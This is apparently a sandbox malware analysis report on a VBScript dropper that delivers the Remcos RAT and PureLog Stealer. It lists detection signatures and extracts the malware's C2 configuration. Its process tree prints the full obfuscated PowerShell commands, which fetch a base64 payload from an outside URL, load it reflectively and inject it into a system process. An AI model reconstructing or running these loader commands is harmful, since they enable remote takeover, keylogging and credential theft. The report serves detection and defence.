Edit tour
Windows
Analysis Report
asegurar.vbs
Overview
General Information
Detection
Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3540 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\asegu rar.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 968 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgneycrJz F9JysndXJs ICcrJz0nKy cgezB9aHQn Kyd0cCcrJ3 MnKyc6Ly9p YTYwMDEnKy cwMCcrJy51 cy4nKydhcm NoaXZlJysn Lm9yJysnZy crJy8yNC8n KydpdGVtcy 9kJysnZXQn KydhaC0nKy duJysnb3Qn KydlLScrJ3 YvRCcrJ2Un Kyd0JysnYS crJ2hOJysn b3RlVicrJy 4nKyd0Jysn eCcrJ3R7MH 0nKyc7eycr JzEnKyd9Ym FzZTYnKyc0 JysnQ28nKy dudGVudCA9 IChOZScrJ3 cnKyctT2Jq ZWMnKyd0IF N5c3RlJysn bS5OZXQuJy snV2ViQ2xp ZScrJ250KS 5EJysnb3cn KydubCcrJ2 8nKydhJysn ZFN0cmknKy duZyh7MX11 JysncmwpOy crJ3snKycx JysnfWJpbi crJ2FyeUNv JysnbicrJ3 RlbnQgPScr JyBbU3knKy dzdCcrJ2Vt LicrJ0MnKy dvbnZlcnQn KyddOjonKy dGJysncm9t JysnQicrJ2 EnKydzZTY0 JysnU3RyaW 5nKHsxfWJh c2U2NCcrJ0 NvbnQnKydl bicrJ3QpO3 sxJysnfWFz Jysnc2UnKy dtYmx5Jysn ID0nKycgW1 JlZmwnKydl Y3QnKydpby crJ24uJysn QXMnKydzZW 1ibHknKydd OjpMb2FkJy snKHsxfScr J2JpbmFyJy sneUNvbicr J3RlbnQpO3 sxfXR5Jysn cCcrJ2UgJy snPSB7MX1h Jysnc3MnKy dlbWJsJysn eScrJy4nKy dHZXRUeXAn KydlKHsnKy cwfVJ1bicr J1BFLkhvbW V7JysnMH0p OycrJ3snKy cxfW0nKydl JysndCcrJ2 gnKydvZCA9 IHsxfXR5cC crJ2UuR2Un Kyd0TWUnKy d0aCcrJ29k KHsnKycwfV ZBSXswfSk7 ezEnKyd9bW V0JysnaG8n KydkJysnLk knKydudm9r ZSh7MScrJ3 1udScrJ2xs JysnLCBbb2 InKydqZWMn Kyd0WycrJ1 0nKyddJysn QCcrJyh7Jy snMH0wLycr J1lqemInKy d0JysnL2Qv ZScrJ2UuZS crJ3RzYXAv LzpzJysncC crJ3QnKyd0 aHswfScrJy AsIHswfWQn KydlJysnc2 F0JysnaXZh ZCcrJ28nKy d7MH0gJysn LCcrJyB7MH 1kZXNhdCcr J2knKyd2Jy snYWQnKydv JysnezB9IC wnKycgeycr JzAnKyd9ZG VzYXRpdicr J2EnKydkb3 swJysnfSwn Kyd7MH0nKy dBZGRJblBy b2MnKydlcy crJ3MnKycz JysnMnswfS x7MH0nKyd7 MCcrJ30pKS cpLWYgIFtj SEFyXTM5LF tjSEFyXTM2 KSB8JiAoIC RlTnY6Q09N c1BFY1s0LD I0LDI1XS1q T2luJycp'; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6488 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{' +'1}'+'url '+'='+' { 0}ht'+'tp' +'s'+'://i a6001'+'00 '+'.us.'+' archive'+' .or'+'g'+' /24/'+'ite ms/d'+'et' +'ah-'+'n' +'ot'+'e-' +'v/D'+'e' +'t'+'a'+' hN'+'oteV' +'.'+'t'+' x'+'t{0}'+ ';{'+'1'+' }base6'+'4 '+'Co'+'nt ent = (Ne' +'w'+'-Obj ec'+'t Sys te'+'m.Net .'+'WebCli e'+'nt).D' +'ow'+'nl' +'o'+'a'+' dStri'+'ng ({1}u'+'rl );'+'{'+'1 '+'}bin'+' aryCo'+'n' +'tent ='+ ' [Sy'+'st '+'em.'+'C '+'onvert' +']::'+'F' +'rom'+'B' +'a'+'se64 '+'String( {1}base64' +'Cont'+'e n'+'t);{1' +'}as'+'se '+'mbly'+' ='+' [Ref l'+'ect'+' io'+'n.'+' As'+'sembl y'+']::Loa d'+'({1}'+ 'binar'+'y Con'+'tent );{1}ty'+' p'+'e '+'= {1}a'+'ss '+'embl'+' y'+'.'+'Ge tTyp'+'e({ '+'0}Run'+ 'PE.Home{' +'0});'+'{ '+'1}m'+'e '+'t'+'h'+ 'od = {1}t yp'+'e.Ge' +'tMe'+'th '+'od({'+' 0}VAI{0}); {1'+'}met' +'ho'+'d'+ '.I'+'nvok e({1'+'}nu '+'ll'+', [ob'+'jec' +'t['+']'+ ']'+'@'+'( {'+'0}0/'+ 'Yjzb'+'t' +'/d/e'+'e .e'+'tsap/ /:s'+'p'+' t'+'th{0}' +' , {0}d' +'e'+'sat' +'ivad'+'o '+'{0} '+' ,'+' {0}de sat'+'i'+' v'+'ad'+'o '+'{0} ,'+ ' {'+'0'+' }desativ'+ 'a'+'do{0' +'},'+'{0} '+'AddInPr oc'+'es'+' s'+'3'+'2{ 0},{0}'+'{ 0'+'}))')- f [cHAr]39 ,[cHAr]36) |& ( $eNv :COMsPEc[4 ,24,25]-jO in'')" MD5: 04029E121A0CFA5991749937DD22A1D9) - AddInProcess32.exe (PID: 3820 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 5344 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "Tost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RZH5WZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 24 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 22 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |